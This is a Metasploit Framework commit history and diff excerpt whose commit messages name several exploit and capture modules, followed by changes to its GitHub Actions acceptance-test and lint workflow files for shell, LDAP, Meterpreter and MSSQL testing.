adfoster-r7 7b56d012e8 Land #18678, add LDAP capture capabilities 2024-02-15 22:11:04 +00:00
bwatters 9e75b70868 Add Windows target 2024-02-15 16:00:59 -06:00
adfoster-r7 40701bf59a Fix auhtentication typo in lib/rex/proto/ldap/auth.rb 2024-02-15 21:26:45 +00:00
n00bhaxor 57eda908d1 Added suggested modificaitons to check for nil response and modify reference link to vendor's issues page. 2024-02-15 13:28:44 -05:00
upsidedwn 8dcb409d25 Fix BUNDLER_CONFIG_ARGS variable mismatch in Dockerfile
Previous version of Dockerfile used `set clean 'true'`. However, this no longer works with "newer" versions of Ruby gems (rubygems/rubygems#3271), which now requires a force option when cleaning system gems.

Since there is no way to set the force flag through config, a new ARG (BUNDLER_FORCE_CLEAN) is used to provide the option of whether to run bundle clean --force on system gems.
2024-02-16 02:16:42 +08:00
h00die f5a6d7d835 Update x11.rb 2024-02-15 12:46:48 -05:00
bwatters 8a1f5de8f1 Fix msftidy issue and update file delete 2024-02-15 10:00:44 -06:00
bwatters 20563b64b2 add check method 2024-02-15 09:05:54 -06:00
randomstr1ng 564c3f8e02 merge sap_icm_paths.txt with seclists sap.txt wordlist and add paths related to potential information leak 2024-02-15 16:03:31 +01:00
Jack Heysel 4e4303c274 Fixed backup_bdc_metadata initialization 2024-02-15 09:26:54 -05:00
h00die 7330c695a9 Update and rename X11.rb to x11.rb 2024-02-15 09:24:33 -05:00
h00die 424c55fdae Update x11.rb 2024-02-15 09:22:33 -05:00
h00die c39d04622f Update and rename X11.rb to x11.rb 2024-02-15 09:22:06 -05:00
Metasploit 1d9a08f405 automatic module_metadata_base.json update 2024-02-15 07:43:02 -06:00
adfoster-r7 e49c6a792a Land #18770, Extract SMB, PostgreSQL, MySQL and MSSQL optional sessions into their own mixins 2024-02-15 13:19:37 +00:00
Metasploit 8e3daa5179 Bump version of framework to 6.3.57 2024-02-15 03:37:54 -06:00
SickMcNugget 69b566ce35 Wider runC version support, add Debian, fix bugs.
Now uses the Rex::Version system to check the user's version of runC.
The old system used to allow runC version 1.1.12 (which is patched).
Now it allows from 1.0.0-rc93->1.1.11 (and I tested that it works as expected).
Support added for Debian as this was tested with both Debian and Ubuntu.
Newer versions of Docker wouldn't delete the built container due to the message format.
I added a new regex to check for the message format which now deletes containers.

Fixed error reporting bug, runC version sanitising

Some runC versions contain the `+` and `~` token. These break
Rex::Version objects. A simple check was added against these symbols
and anything following them is cut off. Another solution may be
to replace these tokens with the `-` symbol to maintain information.
One of the failure cases was unreachable and this was fixed.

Fix runC and docker presence checks

The old runC and docker presence checks wer using `if` instead of `unless`.
executable? also requires a full path to work correctly. Since only the command
names themselves were being passed in, the check was silently failing.
The chosen fix was to instead use the command_exists? function,
which has the added benefit of working on both Windows and Linux.
2024-02-15 16:45:40 +08:00
bwatters 843c64d2f6 Code cleaned up 2024-02-14 19:08:11 -06:00
bwatters 67cd9b425b Working, but ugly 2024-02-14 15:42:50 -06:00
h00die-gr3y d716e60cf2 added base64 encoder module of zerosteiner 2024-02-14 21:33:50 +00:00
h00die-gr3y f5c71d09c2 using data/kafka_ui_versions.json for the version check 2024-02-14 20:57:46 +00:00
H00die.Gr3y 8b70cefd83 Update modules/exploits/linux/http/kafka_ui_unauth_rce_cve_2023_52251.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-02-14 20:57:46 +00:00
H00die.Gr3y 996ca8a7c9 Update documentation/modules/exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-02-14 20:57:46 +00:00
h00die-gr3y f75722ecf2 Small updates to module and documentation 2024-02-14 20:57:46 +00:00
h00die-gr3y dde7e3c5d3 Small tweaks to verbose messages 2024-02-14 20:57:46 +00:00
h00die-gr3y eafdb8495b Added documentation 2024-02-14 20:57:46 +00:00
h00die-gr3y d5f30befbb Second release of module 2024-02-14 20:57:46 +00:00
h00die-gr3y 3db32da70f First release of module. 2024-02-14 20:57:45 +00:00
h00die-gr3y 5f703b2e28 First draft. Not ready for review 2024-02-14 20:57:45 +00:00
Jack Heysel d987b81591 Use Rex MIME Message 2024-02-14 13:15:37 -05:00
Dean Welch fa5c4c0193 lowercase session types 2024-02-14 15:45:34 +00:00
Dean Welch 0d4e1ed755 Use mssql option session mixin with mssql modules 2024-02-14 15:37:11 +00:00
Dean Welch 587a8690a1 Use individual session mixins 2024-02-14 15:37:11 +00:00
Dean Welch 08872d0211 Add session type to info hash in the mixin 2024-02-14 15:37:11 +00:00
Dean Welch 0f319bdfb9 Extract SMB and PostgreSQL optional sessions into their own mixins 2024-02-14 15:37:11 +00:00
n00bhaxor 35f8c6ce8a Added fixes suggested by reviewer. Added a fix for redirects due to workspaces being case-insensitive. 2024-02-14 09:09:52 -05:00
Spencer McIntyre b6b382c4d2 Catch exception when updating non-existing session 2024-02-13 16:28:45 -05:00
sfewer-r7 423bf0c519 work in progress exploit module for cve-2023-47218 2024-02-13 17:32:14 +00:00
h00die 6156fb55a6 Create spec for X11.rb 2024-02-13 12:24:49 -05:00
h00die b22cafb6a1 Update X11.rb 2024-02-13 10:47:08 -05:00
h00die faa80dc850 Create lib for X11.rb 2024-02-13 10:46:16 -05:00
bwatters cc0fc56874 Draft nonworking start 2024-02-12 17:44:24 -06:00
n00bhaxor 58eba131a8 fixed error with single character variable 2024-02-12 09:47:21 -05:00
n00bhaxor 3203c7cb66 corrected formatting and other errors with rubocop 2024-02-12 09:37:37 -05:00
n00bhaxor fdcd9e26ad Adding module for gitlab_email_disclosure 2024-02-09 20:51:45 -05:00
sfewer-r7 1f292c8a73 remove the linux and unix targets in favor of a single automatic target 2024-02-09 09:26:08 +00:00
Gaurav Jain 184ed3a162 Add suggested changes 2024-02-09 02:22:20 +05:30
Gaurav Jain 4dc21bae45 Merge branch 'rapid7:master' into manageengine 2024-02-08 15:11:15 +05:30
Gaurav Jain 25804edbf4 Add java targets for manageengine cve-2022-47966 modules 2024-02-08 01:55:52 +05:30
h00die 84278b8e0e fix ofbiz auto detection 2024-02-06 16:45:02 -05:00
Jack Heysel ad45681116 Updated jwt_token format 2024-02-06 16:42:56 -05:00
Jack Heysel 92bbc47bd8 Changed tabs to spaces fixed msftidy 2024-02-06 15:54:33 -05:00
Jack Heysel 4bb871453e Rubocop 2024-02-06 15:44:06 -05:00
Jack Heysel 326b50bd4d Responded to comments 2024-02-06 15:22:21 -05:00
sfewer-r7 03a58c784b fix typo in variable name 2024-02-06 14:08:54 +00:00
sfewer-r7 367783bcb5 add in RCE exploit for CVE-2024-21893 2024-02-06 11:49:04 +00:00
h00die 1e6cf524b9 rubocop on jenkins lib 2024-02-02 16:35:56 -05:00
h00die c37984edb2 jenkins cli ampersand exploit review 2024-02-02 16:35:11 -05:00
Jeffrey Martin bed552d26e set error on unsupported LDAP auth 2024-02-02 08:36:00 -06:00
Jeffrey Martin 1c334ad670 address stack trace noticed in testing 2024-02-01 08:49:16 -06:00
Jeffrey Martin e5b5f12a4e add missing sasl mechanism constant
* support mechanism reported as NTLM or GSS-SPNEGO
* return ResultCodeAuthMethodNotSupported for unknown bindRequest auth
2024-02-01 08:44:55 -06:00
cudalac 2b01b86374 Adding new module for MinIO 2024-01-31 13:33:04 -05:00
h00die bf6d2de53d docs 2024-01-30 18:03:57 -05:00
h00die c6c1414908 docs 2024-01-30 17:57:52 -05:00
h00die 473672047f updates to jenkins ccli ampersand file read 2024-01-30 17:56:59 -05:00
h00die 064a2f3468 updates to jenkins ccli ampersand file read 2024-01-30 17:12:10 -05:00
h00die ab4f83ffbe additional documentation for CVE-2024-23897 2024-01-29 19:50:17 -05:00
h00die 2c0f99a649 initial POC for jenkins CVE-2024-23897 2024-01-29 17:25:16 -05:00
h00die 2efbf6e2f5 review comments 2024-01-29 17:21:06 -05:00
h00die 779da83d59 gitlab password reset account takeoever review 2024-01-27 07:44:11 -05:00
h00die e6c4195ad3 gitlab password reset account takeoever review 2024-01-27 07:42:25 -05:00
ErikWynter 26e2b2e319 Add docs for opennms authenticated rce 2024-01-27 01:13:22 +02:00
ErikWynter 14181572c1 add PRIVESC_SAVE_DELAY option for opennms authenticated RCE 2024-01-27 01:13:04 +02:00
ErikWynter acc15c23fe Add code review changes to opennms auth rce 2024-01-27 00:10:45 +02:00
Gaurav Jain 38c9185564 Add reviewed changes 2024-01-26 22:58:00 +05:30
Jeffrey Martin 4cb18483d6 cleanup LDAP NTLM type2 response 2024-01-25 10:56:25 -06:00
Jeffrey Martin d20ef7a08b add LDAP to capture plugin 2024-01-23 13:52:35 -06:00
Jeffrey Martin bcefde29c3 correct metadata for Actions usage 2024-01-23 12:13:24 -06:00
Jack Heysel aa30a00c0e Rubocop 2024-01-21 19:45:29 -05:00
Jack Heysel 7a5fe5b32c Randomized payload plus minor fixes 2024-01-21 19:04:14 -05:00
jheysel-r7 be631e5213 Apply remaining suggestions from jvoisin
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-01-19 20:32:49 -05:00
jheysel-r7 5f1fa2a678 Apply suggestions from jvoisin
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-01-19 20:30:53 -05:00
Jack Heysel 9e5783a3e7 Rubocop 2024-01-19 15:42:39 -05:00
Jack Heysel 31ebc8273a Added AutoCheck check in exploit method 2024-01-19 15:40:35 -05:00
Jack Heysel 854ec41db1 Initial commit 2024-01-19 15:22:22 -05:00
h00die 482d2b28b1 gitlab password reset account takeoever 2024-01-18 16:19:26 -05:00
Gaurav Jain fd3ca96988 Update splunk cve-2023-32707 to use splunk library 2024-01-19 01:56:15 +05:30
Gaurav Jain 97ef243d2e Add Splunk library 2024-01-18 22:47:13 +05:30
h00die d7cf9155a6 ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00
h00die a8bc6cc27f ssh_version module docs 2024-01-11 14:56:09 -05:00
h00die d57c9fb464 ssh_version module 2024-01-11 14:48:21 -05:00
Jeffrey Martin 5a14575a31 Adjustment for extra knobs to tweak during auth
* clarify the NTLM SASL challenge
* add default case for unsuppoted SASL types
* implement unknown method to support override
2024-01-11 10:30:58 -06:00
h00die b8e2feebe0 ssh_version module 2024-01-09 17:52:17 -05:00
h00die 6de51a5047 non-working module 2024-01-08 19:49:47 -05:00
h00die 077cad34ab non-working module 2024-01-08 19:47:24 -05:00
Jeffrey Martin 6d298c379b remove unused advanced option 2024-01-07 13:02:04 -06:00
Jeffrey Martin a4e8714de6 Land #18376, NTLM support for the LDAP capture 2024-01-07 12:59:37 -06:00
Nishant Desai a09cf6471a Merge pull request #11 from jmartin-tech/GSoC/LDAP-NTLM-adjustments
adjustments to NTLM LDAP support
2024-01-05 23:41:26 -05:00
Jeffrey Martin 2ab1b7a310 adjustments to NTLM LDAP support
* invert storage test for callback
* do not override service instance domain and hostname
* remove wrapping `Array` on `context_data` in response
* generate NTLM Type1 message instead of hardcoded blob
2024-01-02 13:08:48 -06:00
ErikWynter e946d78993 Add opennms_horizon_authenticated_rce exploit 2023-12-13 18:03:56 +02:00
RadioLogic 82b8556c78 Improves documentation based on suggestions
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2023-12-05 13:52:47 -05:00
RadioLogic cc4fa7cd39 Removed kernel module reload 2023-11-29 16:48:05 -05:00
RadioLogic 4efad9eb24 Added cleanup function 2023-11-29 16:37:10 -05:00
RadioLogic 4585ec0336 Added more comments 2023-11-29 16:36:33 -05:00
RadioLogic 5f4c17edbf Turned bitmask detection into proper bool
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-11-29 13:45:49 -05:00
RadioLogic 5314902e74 Implemented auto check into module 2023-11-10 20:59:29 -05:00
RadioLogic 12833fd0d5 Updated documenting code from template used 2023-11-10 20:49:09 -05:00
RadioLogic 468265e815 Updated verification steps in documentation 2023-11-07 22:00:19 -05:00
RadioLogic 9301e29a6e Fixed msftidy issues 2023-11-07 21:56:47 -05:00
RadioLogic cf0477138d Added documentation for kernel escape 2023-11-07 21:50:09 -05:00
RadioLogic 2d683954de Removed excess line used for debugging 2023-11-07 21:49:49 -05:00
RadioLogic f947e6a438 Created container escape module 2023-11-07 21:23:49 -05:00
JustAnda7 6ba5d03993 Addition-of-suitable-tests-for-the-libraries 2023-11-04 11:43:01 -04:00
JustAnda7 672d651221 Optimization-of-the-libraries-using-Net-NTLM 2023-11-04 11:41:27 -04:00
Nishant Desai 70c69f46a5 Merge pull request #9 from JustAnda7/GSoC/creating-rex-lib-for-auth
Shifting appropriate methods to Auth lib
2023-10-08 12:58:52 +05:30
JustAnda7 7876912eab Changes-as-per-comments 2023-10-08 02:49:46 -04:00
JustAnda7 ea189d6c34 Changes-to-the-helper-lib 2023-10-02 13:35:28 -04:00
Nishant Desai 1a3b00e593 shifting-appropriate-methods-to-auth-lib 2023-09-27 12:23:29 +00:00
JustAnda7 6972a910fb changes-to-support-ntlm 2023-09-20 16:48:08 +00:00
Jeffrey Martin 6b5fff6c33 Land #18125, LDAP Capture Simple Authentication 2023-09-01 11:08:19 -05:00
JustAnda7 05d6e9815d changes-to-support-nmap 2023-09-01 08:07:01 -04:00
JustAnda7 79d3cc81cb changes-to-support-nmap-script 2023-08-01 07:50:01 -04:00
JustAnda7 8e33badd80 Better-parsing-of-dn-and-minor-changes 2023-07-05 18:21:48 +00:00
Nishant Desai 823824163e Documentation-of-Capturing-Simple-Auth 2023-06-21 13:29:25 +00:00
Nishant Desai e3c97148e8 Capturing-SimpleBind-Authentication 2023-06-18 18:47:42 +00:00
1490 changed files with 137848 additions and 19656 deletions
+4 -1
View File
@@ -2,4 +2,7 @@ blank_issues_enabled: false
contact_links:
- name: Termux Issues?
url: https://github.com/rapid7/metasploit-framework/issues/11023
about: Termux is not officially supported, check here for more info
about: Termux is not officially supported, check here for more info
- name: Android Payload Issues?
url: https://github.com/rapid7/metasploit-framework/issues/19154
about: Check here for more info
@@ -1,4 +1,5 @@
name: Acceptance
name: Command Shell Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
@@ -22,6 +23,16 @@ permissions:
statuses: none
on:
workflow_dispatch:
inputs:
metasploitPayloadsCommit:
description: 'metasploit-payloads branch you want to test'
required: true
default: 'master'
mettleCommit:
description: 'mettle branch you want to test'
required: true
default: 'master'
push:
branches-ignore:
- gh-pages
@@ -40,6 +51,7 @@ on:
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
@@ -51,66 +63,45 @@ jobs:
fail-fast: false
matrix:
os:
- macos-11
- windows-2019
- ubuntu-20.04
ruby:
- 3.0.2
meterpreter:
# Python
- { name: python, runtime_version: 3.6 }
- { name: python, runtime_version: 3.11 }
# Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
- { name: java, runtime_version: 8 }
# PHP - Temporarily removed as tests are timing out on Github actions
# - { name: php, runtime_version: 5.3 }
# - { name: php, runtime_version: 7.4 }
# - { name: php, runtime_version: 8.2 }
- '3.2'
include:
# Windows Meterpreter
- { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
- { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
# Powershell
- { command_shell: { name: powershell }, os: windows-2019 }
- { command_shell: { name: powershell }, os: windows-2022 }
# Mettle
- { meterpreter: { name: mettle }, os: macos-11 }
- { meterpreter: { name: mettle }, os: ubuntu-20.04 }
# Linux
- { command_shell: { name: linux }, os: ubuntu-20.04 }
# CMD
- { command_shell: { name: cmd }, os: windows-2019 }
- { command_shell: { name: cmd }, os: windows-2022 }
runs-on: ${{ matrix.os }}
timeout-minutes: 25
timeout-minutes: 50
env:
RAILS_ENV: test
HOST_RUNNER_IMAGE: ${{ matrix.os }}
METERPRETER: ${{ matrix.meterpreter.name }}
METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
SESSION: 'command_shell/${{ matrix.command_shell.name }}'
SESSION_RUNTIME_VERSION: ${{ matrix.command_shell.runtime_version }}
BUNDLE_WITHOUT: "coverage development"
name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
name: ${{ matrix.command_shell.name }} ${{ matrix.command_shell.runtime_version }} ${{ matrix.os }}
steps:
- name: Install system dependencies (Linux)
if: runner.os == 'Linux'
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
if: ${{ matrix.meterpreter.name == 'php' }}
- uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
if: ${{ matrix.command_shell.name == 'php' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
php-version: ${{ matrix.command_shell.runtime_version }}
tools: none
- name: Set up Python
if: ${{ matrix.meterpreter.name == 'python' }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.meterpreter.runtime_version }}
- uses: actions/setup-java@v3
if: ${{ matrix.meterpreter.name == 'java' }}
with:
distribution: temurin
java-version: ${{ matrix.meterpreter.runtime_version }}
- name: Install system dependencies (Windows)
shell: cmd
if: runner.os == 'Windows'
@@ -126,23 +117,26 @@ jobs:
dir %WINDIR%
type %WINDIR%\\system32\\drivers\\etc\\hosts
- name: Checkout code
uses: actions/checkout@v3
# The job checkout structure is:
# .
# └── metasploit-framework
- name: Checkout metasploit-framework code
uses: actions/checkout@v4
with:
path: metasploit-framework
- name: Setup Ruby
env:
BUNDLE_WITHOUT: "coverage development"
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
cache-version: 4
# Github actions with Ruby requires Bundler 2.2.18+
# https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
bundler: 2.2.33
working-directory: metasploit-framework
cache-version: 5
- name: acceptance
- name: Acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
@@ -154,15 +148,16 @@ jobs:
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/
bundle exec rspec spec/acceptance/command_shell_spec.rb
working-directory: metasploit-framework
- name: Archive results
if: always()
uses: actions/upload-artifact@v3
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
path: tmp/allure-raw-data
name: raw-data-${{ matrix.command_shell.name }}-${{ matrix.command_shell.runtime_version }}-${{ matrix.os }}
path: metasploit-framework/tmp/allure-raw-data
# Generate a final report from the previous test results
report:
@@ -173,7 +168,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v3
uses: actions/checkout@v4
if: always()
- name: Install system dependencies (Linux)
@@ -183,18 +178,14 @@ jobs:
- name: Setup Ruby
if: always()
env:
BUNDLE_WITHOUT: "coverage development"
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: 3.0.2
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
# Github actions with Ruby requires Bundler 2.2.18+
# https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
bundler: 2.2.33
- uses: actions/download-artifact@v3
- uses: actions/download-artifact@v4
id: download
if: always()
with:
@@ -217,7 +208,7 @@ jobs:
- name: archive results
if: always()
uses: actions/upload-artifact@v3
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
+2 -2
View File
@@ -32,7 +32,7 @@ jobs:
# Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
build:
runs-on: ubuntu-latest
timeout-minutes: 40
timeout-minutes: 60
strategy:
fail-fast: true
@@ -43,7 +43,7 @@ jobs:
name: Ruby ${{ matrix.ruby }}
steps:
- name: Checkout code
uses: actions/checkout@v3
uses: actions/checkout@v4
- name: Setup Ruby
uses: ruby/setup-ruby@v1
+1 -1
View File
@@ -195,7 +195,7 @@ jobs:
close: true,
comment: `
Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
`
}
+161
View File
@@ -0,0 +1,161 @@
name: LDAP Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**ldap**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
ldap:
runs-on: ${{ matrix.os }}
timeout-minutes: 60
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
os:
- ubuntu-latest
env:
RAILS_ENV: test
BUNDLE_WITHOUT: "coverage development pcap"
name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
steps:
- name: Install system dependencies
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v4
- name: Run samba/ldap docker container
working-directory: 'test/ldap'
run: |
docker compose build
docker compose up --wait -d
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
RUNTIME_VERSION: latest
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/ldap_spec.rb
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: ldap-acceptance-${{ matrix.os }}
path: tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs:
- ldap
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
if: always()
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
- uses: actions/download-artifact@v4
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+6 -5
View File
@@ -29,13 +29,16 @@ on:
jobs:
msftidy:
runs-on: ubuntu-latest
timeout-minutes: 40
timeout-minutes: 60
env:
BUNDLE_WITHOUT: "coverage development pcap"
strategy:
fail-fast: true
matrix:
ruby:
- '3.0'
- '3.2'
name: Lint msftidy
steps:
@@ -43,7 +46,7 @@ jobs:
run: sudo apt-get install libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v3
uses: actions/checkout@v4
# Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
# https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
with:
@@ -53,8 +56,6 @@ jobs:
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
env:
BUNDLE_WITHOUT: "coverage development pcap"
- name: Run msftidy
run: |
@@ -0,0 +1,66 @@
name: Meterpreter Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
workflow_dispatch:
inputs:
metasploit_payloads_commit:
description: 'metasploit-payloads branch you want to test'
required: true
default: 'master'
mettle_commit:
description: 'mettle branch you want to test'
required: true
default: 'master'
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- 'data/templates/**'
- 'modules/payloads/**'
- 'lib/msf/core/payload/**'
- 'lib/msf/core/**'
- 'test/modules/**'
- 'tools/dev/**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
build:
uses: ./.github/workflows/shared_meterpreter_acceptance.yml
with:
metasploit_payloads_commit: ${{ github.event.inputs.metasploit_payloads_commit }}
mettle_commit: ${{ github.event.inputs.mettle_commit }}
build_metasploit_payloads: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
build_mettle: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
+174
View File
@@ -0,0 +1,174 @@
name: MSSQL Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**mssql**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
mssql:
runs-on: ${{ matrix.os }}
timeout-minutes: 60
services:
mssql:
image: ${{ matrix.docker_image }}
ports: ["1433:1433"]
env:
MSSQL_SA_PASSWORD: yourStrong(!)Password
ACCEPT_EULA: 'Y'
options: >-
--health-cmd "/opt/mssql-tools18/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -C -Q 'select 1' -b -o /dev/null"
--health-interval 10s
--health-timeout 5s
--health-retries 5
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
os:
- ubuntu-latest
docker_image:
- mcr.microsoft.com/mssql/server:2022-latest
- mcr.microsoft.com/mssql/server:2019-latest
env:
RAILS_ENV: test
BUNDLE_WITHOUT: "coverage development pcap"
name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
steps:
- name: Install system dependencies
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v4
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
- name: Extract runtime version
run: |
echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d '/:')" >> $GITHUB_ENV
env:
DOCKER_IMAGE: ${{ matrix.docker_image }}
OS: ${{ matrix.os }}
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
